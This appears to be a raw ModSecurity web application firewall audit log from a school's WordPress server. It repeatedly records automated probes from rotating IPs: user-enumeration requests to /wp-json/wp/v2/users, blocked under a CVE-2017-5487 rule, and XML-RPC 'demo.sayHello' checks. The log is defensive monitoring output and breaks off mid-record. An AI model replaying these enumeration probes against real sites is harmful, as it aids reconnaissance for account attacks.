smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --acab2f6a-C-- demo.sayHello --acab2f6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --acab2f6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299747017270 3203 (- - -) Stopwatch2: 1746299747017270 3203; combined=2369, p1=318, p2=1921, p3=16, p4=17, p5=57, sr=43, sw=40, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acab2f6a-Z-- --c8429b5e-A-- [04/May/2025:02:24:02 +0700] aBZtUsP0ZqGY3Jj2X92clwAAAAI 103.236.140.4 50812 103.236.140.4 8181 --c8429b5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c8429b5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8429b5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746300242526567 3301 (- - -) Stopwatch2: 1746300242526567 3301; combined=1402, p1=446, p2=924, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8429b5e-Z-- --ac295003-A-- [04/May/2025:02:24:08 +0700] aBZtWESOhfQ6W15Bgg8R3gAAAE4 103.236.140.4 50816 103.236.140.4 8181 --ac295003-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac295003-C-- demo.sayHello --ac295003-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac295003-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300248439999 6469 (- - -) Stopwatch2: 1746300248439999 6469; combined=4733, p1=604, p2=3886, p3=39, p4=42, p5=97, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac295003-Z-- --508a7c56-A-- [04/May/2025:02:30:50 +0700] aBZu6kSOhfQ6W15Bgg8R5QAAAFY 103.236.140.4 50864 103.236.140.4 8181 --508a7c56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --508a7c56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --508a7c56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746300650178845 3138 (- - -) Stopwatch2: 1746300650178845 3138; combined=1360, p1=461, p2=869, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --508a7c56-Z-- --52a1f534-A-- [04/May/2025:02:30:57 +0700] aBZu8USOhfQ6W15Bgg8R5wAAAEI 103.236.140.4 50868 103.236.140.4 8181 --52a1f534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52a1f534-C-- demo.sayHello --52a1f534-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a1f534-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300657848281 5869 (- - -) Stopwatch2: 1746300657848281 5869; combined=4325, p1=537, p2=3564, p3=29, p4=32, p5=95, sr=111, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a1f534-Z-- --e2caff29-A-- [04/May/2025:02:31:45 +0700] aBZvIUSOhfQ6W15Bgg8R6AAAAEs 103.236.140.4 50872 103.236.140.4 8181 --e2caff29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2caff29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2caff29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746300705723673 3235 (- - -) Stopwatch2: 1746300705723673 3235; combined=1455, p1=518, p2=907, p3=0, p4=0, p5=30, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2caff29-Z-- --186bc715-A-- [04/May/2025:02:31:49 +0700] aBZvJUSOhfQ6W15Bgg8R6gAAAEw 103.236.140.4 50876 103.236.140.4 8181 --186bc715-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --186bc715-C-- demo.sayHello --186bc715-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --186bc715-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300709638047 6434 (- - -) Stopwatch2: 1746300709638047 6434; combined=4668, p1=603, p2=3830, p3=36, p4=40, p5=95, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --186bc715-Z-- --ed077f0b-A-- [04/May/2025:02:35:54 +0700] aBZwGkSOhfQ6W15Bgg8R8AAAAFQ 103.236.140.4 50896 103.236.140.4 8181 --ed077f0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed077f0b-C-- demo.sayHello --ed077f0b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed077f0b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300954947218 5374 (- - -) Stopwatch2: 1746300954947218 5374; combined=3997, p1=510, p2=3258, p3=29, p4=32, p5=103, sr=69, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed077f0b-Z-- --88ee1e76-A-- [04/May/2025:03:28:05 +0700] aBZ8VYOgvPi2IO4kz1sCYAAAAIw 103.236.140.4 51244 103.236.140.4 8181 --88ee1e76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --88ee1e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88ee1e76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304085792433 2908 (- - -) Stopwatch2: 1746304085792433 2908; combined=1297, p1=448, p2=818, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88ee1e76-Z-- --b27ea825-A-- [04/May/2025:03:28:10 +0700] aBZ8WileQJs6d7wanHHVDgAAAMM 103.236.140.4 51248 103.236.140.4 8181 --b27ea825-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b27ea825-C-- demo.sayHello --b27ea825-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b27ea825-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304090688804 6014 (- - -) Stopwatch2: 1746304090688804 6014; combined=4360, p1=600, p2=3531, p3=35, p4=37, p5=94, sr=83, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b27ea825-Z-- --0323734c-A-- [04/May/2025:03:28:25 +0700] aBZ8aSleQJs6d7wanHHVDwAAANY 103.236.140.4 51252 103.236.140.4 8181 --0323734c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0323734c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0323734c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304105271999 3251 (- - -) Stopwatch2: 1746304105271999 3251; combined=1405, p1=477, p2=875, p3=0, p4=0, p5=52, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0323734c-Z-- --e4478d7d-A-- [04/May/2025:03:28:31 +0700] aBZ8b0SOhfQ6W15Bgg8SEQAAAFE 103.236.140.4 51256 103.236.140.4 8181 --e4478d7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4478d7d-C-- demo.sayHello --e4478d7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4478d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304111608500 4629 (- - -) Stopwatch2: 1746304111608500 4629; combined=3650, p1=430, p2=3025, p3=22, p4=24, p5=88, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4478d7d-Z-- --15ae5654-A-- [04/May/2025:03:30:10 +0700] aBZ80oOgvPi2IO4kz1sCYgAAAIU 103.236.140.4 51270 103.236.140.4 8181 --15ae5654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15ae5654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15ae5654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304210837298 3225 (- - -) Stopwatch2: 1746304210837298 3225; combined=1335, p1=456, p2=846, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15ae5654-Z-- --749fb904-A-- [04/May/2025:03:30:15 +0700] aBZ81yleQJs6d7wanHHVEgAAAMY 103.236.140.4 51274 103.236.140.4 8181 --749fb904-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --749fb904-C-- demo.sayHello --749fb904-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --749fb904-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304215754513 6285 (- - -) Stopwatch2: 1746304215754513 6285; combined=4542, p1=570, p2=3760, p3=31, p4=33, p5=87, sr=82, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749fb904-Z-- --c93a0d4c-A-- [04/May/2025:03:30:39 +0700] aBZ87yleQJs6d7wanHHVFAAAANM 103.236.140.4 51278 103.236.140.4 8181 --c93a0d4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c93a0d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c93a0d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304239240880 2136 (- - -) Stopwatch2: 1746304239240880 2136; combined=1036, p1=365, p2=643, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c93a0d4c-Z-- --43b61459-A-- [04/May/2025:03:30:44 +0700] aBZ89ESOhfQ6W15Bgg8SFQAAAE0 103.236.140.4 51282 103.236.140.4 8181 --43b61459-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43b61459-C-- demo.sayHello --43b61459-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43b61459-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304244691055 5114 (- - -) Stopwatch2: 1746304244691055 5114; combined=3895, p1=531, p2=3156, p3=23, p4=26, p5=93, sr=141, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b61459-Z-- --03e9de04-A-- [04/May/2025:03:39:54 +0700] aBZ_GoOgvPi2IO4kz1sCZQAAAIQ 103.236.140.4 51370 103.236.140.4 8181 --03e9de04-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03e9de04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e9de04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
